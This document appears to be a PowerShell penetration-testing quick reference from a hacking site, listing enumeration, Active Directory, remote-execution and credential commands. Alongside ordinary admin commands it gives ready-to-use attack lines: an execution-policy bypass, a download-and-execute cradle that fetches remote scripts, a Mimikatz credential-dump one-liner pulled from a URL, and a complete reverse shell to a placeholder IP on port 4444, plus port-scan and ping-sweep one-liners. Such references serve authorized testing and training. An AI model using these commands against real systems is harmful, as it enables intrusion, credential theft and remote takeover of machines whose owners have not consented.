PowerShell Pentesting Quick Reference
Hackers Manifest - hackersmanifest.com
Quick Reference
PowerShell commands for enumeration, post-exploitation, and Active Directory attacks.
🖥️ System Enumeration
| System info | systeminfo |
| Hostname | $env:COMPUTERNAME |
| Current user | whoami /all |
| Privileges | whoami /priv |
| Domain | $env:USERDOMAIN |
| Processes | Get-Process |
| Services | Get-Service |
| Environment | Get-ChildItem Env: |
👥 User & Group Enum
| Local users | Get-LocalUser |
| Local groups | Get-LocalGroup |
| Local admins | Get-LocalGroupMember -Group "Administrators" |
| Domain users | Get-ADUser -Filter * |
| Domain groups | Get-ADGroup -Filter * |
| Domain admins | Get-ADGroupMember -Identity "Domain Admins" |
| User details | Get-ADUser user -Properties * |
🌐 Network Enumeration
| IP config | Get-NetIPConfiguration |
| Adapters | Get-NetAdapter |
| Routes | route print |
| ARP table | arp -a |
| Open ports | Get-NetTCPConnection | Where State -eq "Listen" |
| DNS lookup | Resolve-DnsName target.com |
| Shares | Get-SmbShare |
| Remote shares | net view \\TARGET |
🏢 AD Enumeration
| Domain info | Get-ADDomain |
| DCs | Get-ADDomainController -Filter * |
| Trusts | Get-ADTrust -Filter * |
| Computers | Get-ADComputer -Filter * |
| Servers | Get-ADComputer -Filter 'OperatingSystem -like "*Server*"' |
| GPOs | Get-GPO -All |
| OUs | Get-ADOrganizationalUnit -Filter * |
| SPNs | Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
📁 File Operations
| List files | Get-ChildItem -Recurse |
| Search files | Get-ChildItem -Recurse -Include *.txt |
| Search content | Select-String -Path *.txt -Pattern "password" |
| Read file | Get-Content file.txt |
| Write file | Set-Content -Path file.txt -Value "data" |
| Download | Invoke-WebRequest -Uri URL -OutFile file |
| Base64 decode | [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("...")) |
🔓 Execution Policy Bypass
| Check policy | Get-ExecutionPolicy |
| Bypass flag | powershell -ep bypass |
| Set policy | Set-ExecutionPolicy Bypass -Scope Process |
| Download & execute | IEX(New-Object Net.WebClient).DownloadString('http://URL/script.ps1') |
| Encoded command | powershell -enc BASE64_ENCODED_CMD |
🌍 Remote Execution
| Enable WinRM | Enable-PSRemoting -Force |
| Remote session | Enter-PSSession -ComputerName TARGET |
| With creds | Enter-PSSession -ComputerName TARGET -Credential DOMAIN\user |
| Run command | Invoke-Command -ComputerName TARGET -ScriptBlock {whoami} |
| Run script | Invoke-Command -ComputerName TARGET -FilePath script.ps1 |
| Multiple hosts | Invoke-Command -ComputerName HOST1,HOST2 -ScriptBlock {whoami} |
🔑 Credential Handling
| Prompt creds | $cred = Get-Credential |
| Create creds | $pass = ConvertTo-SecureString "Password" -AsPlain -Force; $cred = New-Object PSCredential("user", $pass) |
| Run as user | Start-Process powershell -Credential $cred |
| Mimikatz | IEX(IWR http://URL/Invoke-Mimikatz.ps1); Invoke-Mimikatz -DumpCreds |
⚡ Useful One-Liners
Reverse Shell
$c=New-Object Net.Sockets.TCPClient('IP',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){$d=(New-Object Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1|Out-String);$s.Write(([text.encoding]::ASCII).GetBytes($r),0,$r.Length)} Port Scan
1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("IP",$_)) "$_ open"} 2>$null Ping Sweep
1..254 | % {"10.0.0.$_: $(Test-Connection -Count 1 -Quiet 10.0.0.$_)"} Generated from Hackers Manifest | For authorized security testing only | hackersmanifest.com